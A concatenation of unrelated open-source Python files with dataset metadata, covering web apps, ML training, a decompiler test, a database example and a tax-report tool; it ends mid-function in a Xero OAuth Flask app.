| 2.09375 | 2 |
application/flicket_errors/__init__.py | abbas0001/flicket | 0 | 16931 | <reponame>abbas0001/flicket
#! python3
# -*- coding: utf-8 -*-
#
from flask import Blueprint
# Flask blueprint for the flicket-errors package; views/handlers are
# presumably registered on it elsewhere in this package — confirm there.
bp_errors = Blueprint('flicket-errors', __name__)
| 1.460938 | 1 |
SmartBuild/modules/migrations/0003_module_shortcut.py | ampamo/smart-build | 0 | 16932 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add the boolean ``shortcut`` flag (default False) to the Module model."""
    dependencies = [
        ('modules', '0002_module_floor'),
    ]
    operations = [
        migrations.AddField(
            model_name='module',
            name='shortcut',
            field=models.BooleanField(default=False),
        ),
    ]
| 1.34375 | 1 |
app/common.py | yxonic/dl-boilerplate | 1 | 16933 | import abc
import argparse
import logging
import pathlib
from collections import namedtuple
from operator import itemgetter
import toml
class NotConfiguredError(Exception):
    """Raised when an operation requires configuration that has not been set.

    NOTE(review): raise sites are outside this chunk — confirm the exact
    contract at the call sites.
    """
    pass
class ParseError(Exception):
    """Raised by Model.parse when command-line style options fail to parse
    (replaces argparse's default exit-on-error behaviour)."""
    pass
class Model(abc.ABC):
    """Interface for a model whose configuration can be built or parsed.

    Each concrete model class implements :meth:`add_arguments` to declare
    its configuration options (types, defaults, etc.) on an ``argparse``
    parser; :meth:`build` and :meth:`parse` then construct instances from
    keyword arguments or command-line style option lists.
    """

    @classmethod
    @abc.abstractmethod
    def add_arguments(cls, parser: argparse.ArgumentParser):
        """Add arguments to an argparse subparser."""
        raise NotImplementedError

    @classmethod
    def build(cls, **kwargs):
        """Build model. Parameters are specified by keyword arguments.

        Example:
            >>> from models import Simple
            >>> model = Simple.build(foo=3)
            >>> print(model.config)
            Simple(foo=3)
        """
        # Sort by key so the generated namedtuple field order is
        # deterministic regardless of call-site keyword order.
        items = sorted(kwargs.items(), key=itemgetter(0))
        # Build keys/values separately instead of zip(*items): the zip
        # unpacking raised ValueError for an empty kwargs dict (bug fix).
        keys = [key for key, _ in items]
        values = [value for _, value in items]
        config = namedtuple(cls.__name__, keys)(*values)
        return cls(config)

    @classmethod
    def parse(cls, args):
        """Parse command-line options and build model.

        Raises:
            ParseError: if *args* cannot be parsed.
        """
        class _ArgumentParser(argparse.ArgumentParser):
            # Raise instead of argparse's default sys.exit() so callers
            # can handle bad input programmatically.
            def error(self, message):
                raise ParseError(message)

        parser = _ArgumentParser(prog='', add_help=False)
        cls.add_arguments(parser)
        args = parser.parse_args(args)
        # NOTE(review): _get_kwargs() is a private argparse API; vars(args)
        # is the public equivalent — confirm before changing.
        config = dict(args._get_kwargs())
        Model._unfold_config(config)
        return cls.build(**config)

    def __init__(self, config):
        """
        Args:
            config (namedtuple): model configuration
        """
        self.config = config

    def __str__(self):
        return str(self.config)

    @staticmethod
    def _unfold_config(cfg):
        """Expand dotted keys in-place: {'a.b': 1} -> {'a': {'b': 1}}.

        Nested dict values are unfolded recursively as well.
        """
        for k, v in list(cfg.items()):
            if isinstance(v, dict):
                Model._unfold_config(v)
            if '.' not in k:
                continue
            # Walk/create the intermediate dicts named by the dotted path.
            d = cfg
            for sec in k.split('.')[:-1]:
                d = d.setdefault(sec, {})
            d[k.split('.')[-1]] = v
            del cfg[k]
class Workspace:
    """Workspace utilities. One can save/load configurations, build models
    with specific configuration, save snapshots, open results, etc., using
    workspace objects."""
    def __init__(self, path: str, model=None, config=None):
        """
        Args:
            path (str): workspace root directory
            model: model class, or its name as a string; when None, the
                configuration is lazily loaded from config.toml on demand
            config (dict): model configuration saved alongside the class name
        """
        self._path = pathlib.Path(path)
        self._log_path = self._path / 'log'
        self._snapshot_path = self._path / 'snapshot'
        self._result_path = self._path / 'result'
        if model is None:
            # Defer to _load() the first time model_cls/config are accessed.
            self._model_cls = None
            self._config = None
            return
        if config is None:
            config = {}
        self._set_model(model, config)
        self._save()
    def __str__(self):
        return str(self.path)
    def __repr__(self):
        return 'Workspace(path=' + str(self.path) + ')'
    def _set_model(self, model, config):
        # Accept either a class object or the class name as a string.
        if isinstance(model, str):
            self._model_cls = Workspace._get_class(model)
        else:
            self._model_cls = model
        self._config = config
    @staticmethod
    def _get_class(name):
        # Resolve a model class by name from the sibling models module.
        from . import models as mm
        return getattr(mm, name)
    @property
    def path(self):
        # Workspace directories are created lazily on first access.
        if not self._path.exists():
            self._path.mkdir(parents=True)
        return self._path
    @property
    def result_path(self):
        if not self._result_path.exists():
            self._result_path.mkdir(parents=True)
        return self._result_path
    @property
    def snapshot_path(self):
        if not self._snapshot_path.exists():
            self._snapshot_path.mkdir(parents=True)
        return self._snapshot_path
    @property
    def log_path(self):
        if not self._log_path.exists():
            self._log_path.mkdir(parents=True)
        return self._log_path
    @property
    def model_name(self):
        return self.model_cls.__name__
    @property
    def model_cls(self):
        if self._model_cls is not None:
            return self._model_cls
        # Not configured in __init__: load from config.toml on demand.
        self._load()
        return self._model_cls
    @property
    def config(self):
        if self._config is not None:
            return self._config
        self._load()
        return self._config
    def setup_like(self, model: Model):
        """Configure workspace with configurations from a given model.
        Args:
            model (Model): model to be used
        """
        self._set_model(model.__class__, model.config._asdict())
    def build_model(self):
        """Build model according to the configurations in current
        workspace."""
        return self.model_cls.build(**self.config)
    def logger(self, name: str):
        """Get a logger that logs to a file.
        Notice that same logger instance is returned for same names.
        Args:
            name(str): logger name
        """
        logger = logging.getLogger(name)
        if logger.handlers:
            # previously configured, remain unchanged
            return logger
        fileFormatter = logging.Formatter('%(levelname)s [%(name)s] '
                                          '%(asctime)s %(message)s',
                                          datefmt='%Y-%m-%d %H:%M:%S')
        fileHandler = logging.FileHandler(
            str(self.log_path / (name + '.log')))
        fileHandler.setFormatter(fileFormatter)
        logger.addHandler(fileHandler)
        return logger
    def _load(self):
        """Load configuration from <workspace>/config.toml."""
        try:
            cfg = toml.load((self.path / 'config.toml').open())
            # The model's own section is keyed by its lowercased class name.
            self._set_model(cfg['model_name'], cfg[cfg['model_name'].lower()])
        except (FileNotFoundError, KeyError):
            raise NotConfiguredError('config.toml doesn\'t exist or '
                                     'is incomplete')
    def _save(self):
        """Save configuration to <workspace>/config.toml."""
        # NOTE(review): a with-block would be safer; the handle leaks if
        # toml.dump raises.
        f = (self.path / 'config.toml').open('w')
        toml.dump({'model_name': self.model_name,
                   self.model_name.lower(): self.config}, f)
        f.close()
class Command(abc.ABC):
    """Command interface."""
    def __init__(self, parser):
        # argparse (sub)parser this command registers its options on.
        self.parser = parser
    def _run(self, args):
        """Adapt a parsed argparse namespace and dispatch to :meth:`run`."""
        ws = Workspace(args.workspace)
        cmd = args.command
        # Drop dispatch bookkeeping before freezing the rest into a namedtuple.
        del args.command, args.func, args.workspace
        args = {name: value for (name, value) in args._get_kwargs()}
        args = namedtuple(cmd.capitalize(), args.keys())(*args.values())
        return self.run(ws, args)
    @abc.abstractmethod
    def run(self, ws, args):
        # Subclasses implement the actual command against workspace ws.
        raise NotImplementedError
| 3.34375 | 3 |
training/train_pos_dep.py | ex00/spacy-ru | 0 | 16934 | <reponame>ex00/spacy-ru
from __future__ import unicode_literals, print_function
import sys
from pathlib import Path
import spacy
from spacy.lang.ru import Russian
from spacy.pipeline import Tagger, DependencyParser
from spacy.util import fix_random_seed, set_lang_class
from models.dep import MyDEP
from models.loadvec import get_ft_vec
from models.pos import MyPOS
from models.t2v import build_tok2vec
from training.corpora.syntagrus import get_syntagrus_example, get_syntagrus
from training.trainer import Trainer, Extractor
from utils.corpus import tag_morphology
# Training configuration; "device" selects the GPU index.
CFG = {"device": 0, 'verbose': 1}
# "-g1" on the command line selects the second GPU.
GPU_1 = "-g1" in sys.argv[1:]
if GPU_1:
    CFG["device"] = 1
TESTS = False
spacy.require_gpu(CFG['device'])
# "--test" runs on the small example corpus (and fewer epochs in main()).
TEST_MODE = "--test" in sys.argv[1:]
if TEST_MODE:
    SynTagRus = get_syntagrus_example(Path("data/syntagrus/"))
else:
    SynTagRus = get_syntagrus(Path("data/syntagrus/"))
def create_pos(nlp, cls=MyPOS, labels=(), **opts):
    """Create a part-of-speech tagger pipe for ``nlp``.

    Args:
        nlp: spaCy pipeline whose vocab the tagger is bound to.
        cls: tagger class to instantiate (defaults to ``MyPOS``).
        labels: iterable of POS tag names registered up front, each with its
            morphology from ``tag_morphology``. An immutable tuple default
            replaces the original mutable ``[]`` default, which is shared
            between calls.
        **opts: extra keyword arguments forwarded to ``cls``.

    Returns:
        The constructed tagger pipe.
    """
    pos = cls(nlp.vocab, **opts)
    for e in labels:
        pos.add_label(e, tag_morphology(e))
    return pos
def create_dep(nlp, cls=MyDEP, labels=(), **opts):
    """Create a dependency-parser pipe for ``nlp``.

    ``labels`` is accepted for signature symmetry with ``create_pos`` but is
    currently unused (label registration below is disabled). The immutable
    tuple default replaces the original mutable ``[]`` default.

    Args:
        nlp: spaCy pipeline whose vocab the parser is bound to.
        cls: parser class to instantiate (defaults to ``MyDEP``).
        labels: dependency label names (currently ignored).
        **opts: extra keyword arguments forwarded to ``cls``.

    Returns:
        The constructed parser pipe.
    """
    dep = cls(nlp.vocab, **opts)
    # for e in labels:
    #     dep.add_label(e)
    return dep
# Shared tok2vec layer built on pretrained fastText vectors; reused by every
# training run below.
ft_vectors = get_ft_vec()
tok2vec = build_tok2vec(embed_size=2000, vectors={"word_vectors": ft_vectors})
def smoke_test():
    """Sanity check: build a blank ru pipeline with both pipes and initialize it."""
    nlp = spacy.blank("ru")
    nlp.add_pipe(create_pos(nlp))
    nlp.add_pipe(create_dep(nlp))
    # Drop the built-in tag map so only trained tags remain.
    nlp.vocab.morphology.tag_map.clear()
    nlp.begin_training(tok2vec=tok2vec, **CFG)
    if TEST_MODE:
        print(nlp.pipeline)
    # Run the parser on a tiny Russian sample to confirm it executes.
    dep = nlp.get_pipe('parser')
    if TEST_MODE:
        print(dep(nlp.tokenizer("приветы всем")))
class Russian2(Russian):
    """Russian subclass, kept for the (disabled) 'ru2' language registration."""
    lang = "ru"
def train_spacy(nlp, epochs):
    """Train ``nlp`` on the SynTagRus corpus for ``epochs`` epochs."""
    # set_lang_class('ru2', Russian2)
    extractor = Extractor()
    cfg = {'tok2vec': tok2vec, **CFG}
    # Fix the RNG for reproducible runs.
    fix_random_seed()
    trainer = Trainer(nlp, SynTagRus.ds_train, SynTagRus.ds_test, extractor, **cfg)
    nlp.vocab.morphology.tag_map.clear()
    trainer.train(epochs=epochs)
def main():
    """Build a blank Russian pipeline with POS tagger + parser and train it."""
    smoke_test()
    nlp = spacy.blank("ru")
    nlp.vocab.morphology.tag_map.clear()
    nlp.add_pipe(create_pos(nlp, labels=[]))
    nlp.add_pipe(create_dep(nlp, labels=[], config={'learn_tokens': False}))
    # nlp.add_pipe(create_pos(nlp, cls=Tagger, labels=SynTagRus.pos))
    # nlp.add_pipe(create_dep(nlp, cls=DependencyParser, labels=SynTagRus.dep, config={'learn_tokens': False}))
    if TEST_MODE:
        print(nlp.pipeline)
    # nlp.add_pipe(create_pos(nlp, labels=SynTagRus.pos))
    # nlp.add_pipe(create_dep(nlp, labels=SynTagRus.dep, config={'learn_tokens': False}))
    if TEST_MODE:
        # Short run on the example corpus; full run otherwise.
        train_spacy(nlp, epochs=5)
    else:
        train_spacy(nlp, epochs=50)
# Allow running this module directly as a training script.
if __name__ == "__main__":
    main()
| 2.265625 | 2 |
tests/test_peephole_optimizations.py | capuanob/angr | 0 | 16935 | <filename>tests/test_peephole_optimizations.py
# pylint:disable=missing-class-docstring,no-self-use
import os
import unittest
import archinfo
import ailment
import angr
from angr.analyses.decompiler.peephole_optimizations import ConstantDereferences
test_location = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'binaries', 'tests')
class TestPeepholeOptimizations(unittest.TestCase):
    """Tests for angr's decompiler peephole optimizations."""
    def test_constant_dereference(self):
        """ConstantDereferences folds loads from read-only memory into constants."""
        # a = *(A) :=> a = the variable at A iff
        # - A is a pointer that points to a read-only section.
        proj = angr.Project(os.path.join(test_location, "armel", "decompiler", "rm"), auto_load_libs=False)
        expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0xa000, proj.arch.bits),
                                 proj.arch.bytes, archinfo.Endness.LE, ins_addr=0x400100)
        opt = ConstantDereferences(proj, proj.kb, 0)
        optimized = opt.optimize(expr)
        assert isinstance(optimized, ailment.Const)
        assert optimized.value == 0x183f8
        # The instruction-address tag must survive the rewrite.
        assert optimized.tags.get('ins_addr', None) == 0x400100, "Peephole optimizer lost tags."
        # multiple cases that no optimization should happen
        # a. Loading a pointer from a writable location
        expr = ailment.Expr.Load(None, ailment.Expr.Const(None, None, 0x21df4, proj.arch.bits), 1, archinfo.Endness.LE)
        opt = ConstantDereferences(proj, proj.kb, 0)
        optimized = opt.optimize(expr)
        assert optimized is None
# Run the test suite when executed directly.
if __name__ == "__main__":
    unittest.main()
| 2.28125 | 2 |
PySpace/mysql/mysql_insertdata.py | dralee/LearningRepository | 0 | 16936 | <filename>PySpace/mysql/mysql_insertdata.py
#!/usr/bin/python3
# 文件名:mysql_createtable.py
import pymysql
# Open the database connection (host, user, password, database).
db = pymysql.connect('localhost', 'root', '1234', 'fdtest')
# Create a cursor object with cursor() for executing statements.
cursor = db.cursor()

# SQL INSERT statement.
sql = """INSERT INTO EMPLOYEE(
     FIRST_NAME,LAST_NAME,AGE,SEX,INCOME)
     VALUES('Mac2','Mohan2',20,'M',6000)"""
# Alternative form, interpolating Python values:
# sql = "INSERT INTO EMPLOYEE(FIRST_NAME, LAST_NAME, AGE, SEX, INCOME) \
#        VALUES ('%s', '%s', '%d', '%c', '%d')" % ('Mac', 'Mohan', 20, 'M', 2000)

try:
    # Execute the statement and commit on success.
    cursor.execute(sql)
    db.commit()
except pymysql.Error:
    # Roll back on database errors only; the original bare `except:` also
    # swallowed KeyboardInterrupt/SystemExit and hid programming errors.
    db.rollback()
finally:
    # Close the connection whether or not the insert succeeded.
    db.close()
| 3.703125 | 4 |
appleseed_python.py | AllegorithmicSAS/sat-scons | 25 | 16937 | import os
import subprocess
import threading
# Serializes renders: the template and generated project files are shared state.
mutex = threading.Lock()


def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
    """Render a PBR material preview with appleseed.

    Fills the scene template with the given texture paths and resolution,
    writes a ``.appleseed`` project next to ``target_file``, then invokes the
    appleseed CLI to render it. Calls are serialized by the module lock.

    Args:
        target_file: output image path; also determines the project filename.
        base_color_tex/normal_tex/roughness_tex/metallic_tex: texture paths
            substituted into the scene template.
        resolution: (width, height) pair for the output frame.
        appleseed_path: appleseed installation root containing ``bin/``.

    Raises:
        Re-raises any failure (template I/O or CLI error) after logging it.
    """
    with mutex:  # equivalent to the original acquire()/finally release()
        try:
            # Read the template file from disk.
            with open("scene_template.appleseed", "r") as file:
                project_text = file.read()

            # Substitute variables by their values.
            substitutions = {
                "$baseColorTexturePath": base_color_tex,
                "$normalTexturePath": normal_tex,
                "$roughnessTexturePath": roughness_tex,
                "$metallicTexturePath": metallic_tex,
                "$frameWidth": str(resolution[0]),
                "$frameHeight": str(resolution[1]),
            }
            for placeholder, value in substitutions.items():
                project_text = project_text.replace(placeholder, value)

            # Write the new project file to disk.
            project_file = os.path.splitext(target_file)[0] + ".appleseed"
            with open(project_file, "w") as file:
                file.write(project_text)

            # Invoke appleseed to render the project file.
            appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
            subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
        except Exception as e:
            print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
            raise
| 2.484375 | 2 |
conjureup/ui/views/credentials.py | iMichka/conjure-up | 1 | 16938 | from ubuntui.utils import Padding
from ubuntui.widgets.hr import HR
from conjureup.app_config import app
from conjureup.ui.views.base import BaseView, SchemaFormView
from conjureup.ui.widgets.selectors import MenuSelectButtonList
class NewCredentialView(SchemaFormView):
    """Form view for entering credentials of the currently selected cloud."""
    title = "New Credential Creation"
    def __init__(self, *args, **kwargs):
        # Personalize the subtitle with the active provider's cloud type.
        cloud_type = app.provider.cloud_type.upper()
        self.subtitle = "Enter your {} credentials".format(cloud_type)
        super().__init__(*args, **kwargs)
class CredentialPickerView(BaseView):
    """Menu view listing existing credentials plus a "new credential" entry."""

    title = "Choose a Credential"
    subtitle = "Please select an existing credential, " \
               "or choose to add a new one."
    footer = 'Please press [ENTER] on highlighted credential to proceed.'

    def __init__(self, credentials, default, submit_cb, back_cb):
        # Store callbacks and menu data before BaseView builds the widget.
        self.prev_screen = back_cb
        self.submit_cb = submit_cb
        self.credentials = credentials
        self.default = default
        super().__init__()

    def build_widget(self):
        """Construct the selector: credentials, a rule, then the add option."""
        selector = MenuSelectButtonList(self.credentials, self.default)
        selector.append(Padding.line_break(""))
        selector.append(HR())
        selector.append_option("Add a new credential", None)
        return selector

    def submit(self):
        # Hand the highlighted selection (None means "add new") to the callback.
        self.submit_cb(self.widget.selected)
| 2.484375 | 2 |
sleekxmpp/plugins/__init__.py | aristanetworks/SleekXMPP | 0 | 16939 | <gh_stars>0
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 <NAME>
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
# Plugin modules exposed by `from sleekxmpp.plugins import *`.
__all__ = ['xep_0004', 'xep_0012', 'xep_0030', 'xep_0033', 'xep_0045',
           'xep_0050', 'xep_0085', 'xep_0092', 'xep_0199', 'gmail_notify',
           'xep_0060', 'xep_0202']
| 0.96875 | 1 |
main.py | pwillworth/dfkreport | 11 | 16940 | #!/usr/bin/env python3
import transactions
import taxmap
import db
import settings
import datetime
import argparse
import uuid
import pickle
import jsonpickle
import logging
import logging.handlers
import traceback
def main():
    """Generate a tax report for a wallet over a date range.

    Fetches (or reloads) the wallet's transaction list, builds the tax map,
    and persists both as pickle files, updating the DB report record at each
    stage. Returns 1 on failure, None on success.
    """
    handler = logging.handlers.RotatingFileHandler('../main.log', maxBytes=33554432, backupCount=10)
    logging.basicConfig(handlers=[handler], level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
    logging.info('We got a report request')
    parser = argparse.ArgumentParser()
    parser.add_argument("wallet", help="The evm compatible wallet address to generate for")
    parser.add_argument("startDate", help="The starting date for the report")
    parser.add_argument("endDate", help="The ending date for the report")
    parser.add_argument("--costbasis", choices=['fifo','lifo','hifo','acb'], help="Method for mapping cost basis to gains")
    parser.add_argument("--chains", choices=['1','2','3','4','5','6','7'], help="Bitwise integer of blockchains to include 1=Harmony,2=Avax,4=DFKChain")
    args = parser.parse_args()
    if args.costbasis == None:
        costBasis = 'fifo'
    else:
        costBasis = args.costbasis
    page_size = settings.TX_PAGE_SIZE
    txResult = 0
    txData = []
    moreOptions = db.ReportOptions()
    # list of transactions is loaded from file if available, otherwise fetched
    reportInfo = db.findReport(args.wallet, args.startDate, args.endDate)
    if reportInfo != None and reportInfo[5] > 0 and len(reportInfo[8]) > 0:
        # Cached path: reportInfo[8] is the transactions filename.
        includedChains = reportInfo[12]
        with open('../transactions/{0}'.format(reportInfo[8]), 'rb') as file:
            txData = pickle.load(file)
    else:
        # generate.py pre-generates report record, but if running outside of that, create one
        if reportInfo == None:
            generateTime = datetime.datetime.now()
            txResult = transactions.getTransactionCount(args.wallet)
            includedChains = 1
            db.createReport(args.wallet, args.startDate, args.endDate, int(datetime.datetime.timestamp(generateTime)), txResult, costBasis, includedChains, 1)
        else:
            includedChains = reportInfo[12]
            try:
                moreOptions = jsonpickle.loads(reportInfo[13])
            except Exception as err:
                logging.warning('Ignoring failure to load more options, probably old ui not setting it.')
        logging.info('Loading transactions list for {0}'.format(args.wallet))
        # Scale up default page size for very large accounts
        if reportInfo != None and reportInfo[4] > page_size*50:
            page_size = min(1000, page_size*5)
        try:
            txData = transactions.getTransactionList(args.wallet, args.startDate, args.endDate, page_size, includedChains)
        except Exception as err:
            logging.error('Unexpected Error {0} fetching transaction list, setting report to failure.'.format(err))
            traceback.print_exc()
            # Status 8 marks a retriable fetch failure.
            db.updateReportError(args.wallet, args.startDate, args.endDate, 8)
            return 1
        # The transactions are written to a file and record updated to indicate fetching complete
        transactionsFile = uuid.uuid4().hex
        with open('../transactions/{0}'.format(transactionsFile), 'wb') as f:
            pickle.dump(txData, f)
        try:
            db.completeTransactions(args.wallet, args.startDate, args.endDate, transactionsFile)
        except Exception as err:
            logging.error('DB report update tx complete failure: {0}'.format(str(err)))
    # With transaction list, we now generate the events and tax map
    try:
        reportData = taxmap.buildTaxMap(txData, args.wallet, datetime.datetime.strptime(args.startDate, '%Y-%m-%d').date(), datetime.datetime.strptime(args.endDate, '%Y-%m-%d').date(), costBasis, includedChains, moreOptions)
    except Exception as err:
        logging.error('Unexpected Error {0} building tax map, setting report to failure.'.format(err))
        traceback.print_exc()
        # Set a different code when web3.exceptions.TransactionNotFound
        # so we can relay that it is about network rpc issue, try later
        if str(err) == "{'message': 'Relay attempts exhausted', 'code': -32050}":
            statusCode = 8
        elif "Bad Gateway for url" in str(err) or "Service Unavailable" in str(err) or "Max retries exceeded" in str(err):
            statusCode = 8
        else:
            # Status 9 marks a non-retriable failure.
            statusCode = 9
        try:
            db.updateReportError(args.wallet, args.startDate, args.endDate, statusCode)
        except Exception as err:
            logging.error('DB report update error failure: {0}'.format(str(err)))
        return 1
    for item in reportData['taxes']:
        logging.debug(str(item.__dict__) + '\n')
    # The results are written to a file and record updated to notify completion
    reportFile = uuid.uuid4().hex
    with open('../reports/{0}'.format(reportFile), 'wb') as f:
        pickle.dump(reportData, f)
    try:
        db.completeReport(args.wallet, args.startDate, args.endDate, reportFile)
    except Exception as err:
        logging.error('DB report update complete failure: {0}'.format(str(err)))
# Command-line entry point.
if __name__ == "__main__":
    main()
| 2.03125 | 2 |
src/tarski/fstrips/contingent/__init__.py | phoeft670/tarski | 29 | 16941 | from .problem import ContingentProblem as Problem
from .. action import Action
from .sensor import Sensor
from . import errors
| 1.171875 | 1 |
p40-49/p48.py | kbrose/project_euler | 1 | 16942 | sum = 0
for i in xrange(1,1001):
sum = sum + i**i
print sum % 10000000000
| 2.40625 | 2 |
property_proteome/length/run.py | rrazban/proteomevis_scripts | 1 | 16943 | #!/usr/bin/python
help_msg = 'get uniprot length of entire proteome'
import os, sys
CWD = os.getcwd()
UTLTS_DIR = CWD[:CWD.index('proteomevis_scripts')]+'/proteomevis_scripts/utlts'
sys.path.append(UTLTS_DIR)
from parse_user_input import help_message
from read_in_file import read_in
from parse_data import organism
from uniprot_api import UniProtAPI
from output import writeout
def parse_chain_length(words, i, verbose):  # TODO(original): put this in class
    """Compute a chain length from a split UniProt CHAIN feature record.

    Args:
        words: whitespace-split tokens of one UniProt record line.
        i: index of the chain start-residue token; ``i + 1`` holds the end
            residue token.
        verbose: if True, print a note for discarded/ambiguous records.

    Returns:
        ``end - start + 1`` when both residues are usable; just ``int(end)``
        when the start is unknown ('?' or '<'); ``''`` when no length can be
        determined (no chain, or an ambiguous end residue).
    """
    # print() calls (rather than py2 print statements) keep this usable on
    # both Python 2 and 3.
    if len(words) == 1:  # does not capture UniProt peptide case
        if verbose:
            print('No chain found: {0}. Structure is discarded'.format(words))
        length = ''
    elif '>' in words[i + 1]:
        length = ''
    elif '?' in words[i + 1]:
        length = ''
    elif '?' in words[i] or '<' in words[i]:
        if verbose:
            print('No starting residue for chain: {0}'.format(words))
        length = int(words[i + 1])
    else:
        length = int(words[i + 1]) - int(words[i]) + 1
    return length
class UniProtLength():
    """Fetch UniProt CHAIN annotations and derive chain lengths.

    Queries the UniProt API in __init__: per-entry for the special
    'new_protherm' organism, otherwise one whole-organism query.
    """
    def __init__(self, verbose, d_ref):
        self.verbose = verbose
        # d_ref maps UniProt accession -> ordered-locus name (see __main__).
        self.d_ref = d_ref
        uniprotapi = UniProtAPI(['id', 'feature(CHAIN)'])
        if organism=='new_protherm':
            print len(d_ref)
            self.labels, self.raw_data = uniprotapi.uniprot_info(d_ref.keys())
        else:
            self.labels, self.raw_data = uniprotapi.organism_info()
        self.d_output = {}
    def run(self):
        """Return {uniprot accession: chain length} for entries present in d_ref."""
        for line in self.raw_data:
            words = line.split()
            uniprot = words[self.labels.index('Entry')]
            if uniprot in self.d_ref:
                # The chain start residue sits right after the 'Chain' column.
                chain_length_i = self.labels.index('Chain')+1
                chain_length = parse_chain_length(words, chain_length_i, self.verbose)
                # Falsy length ('') means the record was unusable; skip it.
                if chain_length:
                    self.d_output[uniprot] = chain_length
        return self.d_output
if __name__ == "__main__":
    args = help_message(help_msg, bool_add_verbose = True)
    # d_ref: UniProt accession -> ordered-locus name for the whole proteome.
    d_ref = read_in('Entry', 'Gene names (ordered locus )', filename = 'proteome')
    uniprot_length = UniProtLength(args.verbose, d_ref)
    d_output = uniprot_length.run()
    if organism!='protherm':
        # Re-key the results by ordered-locus name for output.
        d_output = {d_ref[uniprot]: res for uniprot, res in d_output.iteritems()}
        xlabel = 'oln'
    else: #not supported for ProTherm
        xlabel = 'uniprot'
    writeout([xlabel, 'length'], d_output, filename = 'UniProt')
| 2.609375 | 3 |
machine_learning/torch_time_series_forecasting/src/data/dataset.py | iimuz/til | 4 | 16944 | """データセットをダウンロードするためのスクリプトです."""
# default packages
import logging
import pathlib
import traceback
import urllib.request as request
# third party
import pandas as pd
import tqdm as tqdm_std
# my packages
import src.data.directory as directory
# logger
logger = logging.getLogger(__name__)
class TqdmUpTo(tqdm_std.tqdm):
    """Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
    Suitable as a ``reporthook`` for ``urllib.request.urlretrieve``.
    Args:
        tqdm (tqdm): tqdm
    """
    def update_to(self, b: int = 1, bsize: int = 1, tsize: int = None) -> None:
        """ update function
        Args:
            b (int, optional): Number of blocks transferred. Defaults to 1.
            bsize (int, optional): Size of each block (in tqdm units). Defaults to 1.
            tsize ([type], optional): Total size (in tqdm units). Defaults to None.
        """
        if tsize is not None:
            self.total = tsize
        # tqdm.update takes a delta, so convert the absolute count b*bsize.
        self.update(b * bsize - self.n)
def get_raw_filepath() -> pathlib.Path:
    """Return the local path where the raw dataset archive is stored."""
    archive_name = get_raw_url().split("/")[-1]
    return directory.get_raw().joinpath(archive_name)
def get_raw_url() -> str:
    """Return the download URL of the Jena climate dataset archive."""
    base = "https://storage.googleapis.com/tensorflow/tf-keras-datasets/"
    return base + "jena_climate_2009_2016.csv.zip"
def _main() -> None:
    """Main script: download the dataset archive if absent, then preview it."""
    logging.basicConfig(level=logging.INFO)
    filepath = get_raw_filepath()
    if filepath.exists() is False:
        url = get_raw_url()
        filepath.parent.mkdir(exist_ok=True, parents=True)
        # Progress bar driven by urlretrieve's reporthook callback.
        with TqdmUpTo(
            unit="B", unit_scale=True, miniters=1, desc=filepath.name
        ) as pbar:
            request.urlretrieve(
                url, filename=filepath, reporthook=pbar.update_to, data=None
            )
    else:
        logger.info(f"data already exists: {filepath}")
    # show dataset description.
    df = pd.read_csv(filepath)
    logger.info(df.info())
    logger.info(df.head())
    logger.info(df.tail())
if __name__ == "__main__":
    try:
        _main()
    except Exception as e:
        # Log any unhandled error with its traceback before exiting.
        logger.error(e)
        logger.error(traceback.format_exc())
| 2.640625 | 3 |
app.py | aracnid/i-xero | 0 | 16945 | <gh_stars>0
"""Primary application.
"""
import json
import logging
import logging.config
import os
import sys
from flask import url_for, render_template, redirect, request
from i_xero import Xero2
from i_xero.i_flask import FlaskInterface
from utils import jsonify, serialize_model
# initialize logging
# The SlackBot app doesn't handle logging in the same way.
# I tried to pass in a logger object from aracnid_logger,
# but it seems to disable all loggers
logging_filename = os.environ.get('LOGGING_CONFIG_FILE')
command_dir = os.path.dirname(sys.argv[0])
# NOTE(review): logging_dir is computed but never used below.
logging_dir = os.path.join(os.getcwd(), command_dir)
logging_path = os.path.join(os.getcwd(), logging_filename)
# Load the JSON logging config and override the console formatter from env.
with open(logging_path, 'rt') as file:
    logging_config = json.load(file)
formatter = os.environ.get('LOGGING_FORMATTER')
logging_config['handlers']['console']['formatter'] = formatter
logging.config.dictConfig(logging_config)
env_str = os.environ.get('LOG_UNHANDLED_EXCEPTIONS')
LOG_UNHANDLED_EXCEPTIONS = env_str.lower() in ('true', 'yes') if env_str else False
# configure flask application
flask_app = FlaskInterface(__name__).get_app()
# configure xero application
xero_app = Xero2(flask_app)
@flask_app.route("/")
def index():
    """Home page: display the current OAuth2 token (empty dict when absent)."""
    xero_access = dict(xero_app.obtain_xero_oauth2_token() or {})
    return render_template(
        "code.html",
        title="Home | oauth token",
        code=jsonify(xero_access),
    )
@flask_app.route("/login")
def login():
    """Start the OAuth2 flow by redirecting to Xero's authorization page."""
    redirect_url = url_for("oauth_callback", _external=True)
    response = xero_app.oauth_app.authorize(callback_uri=redirect_url)
    return response
@flask_app.route("/callback")
def oauth_callback():
    """OAuth2 redirect endpoint: exchange the authorization code for a token."""
    try:
        response = xero_app.oauth_app.authorized_response()
    except Exception:
        # Log the full traceback through the configured logging setup instead
        # of the original print(e), which lost the traceback; then re-raise so
        # Flask still surfaces the error to the client.
        logging.exception("Xero OAuth2 token exchange failed")
        raise
    # todo validate state value
    if response is None or response.get("access_token") is None:
        return "Access denied: response=%s" % response
    # Persist the token so subsequent requests are authenticated.
    xero_app.store_xero_oauth2_token(response)
    return redirect(url_for("index", _external=True))
@flask_app.route("/logout")
def logout():
    """Discard the stored OAuth2 token and return to the home page."""
    xero_app.store_xero_oauth2_token(None)
    return redirect(url_for("index", _external=True))
@flask_app.route("/refresh-token")
def refresh_token():
    """Refresh the OAuth2 token and show the old and new tokens side by side."""
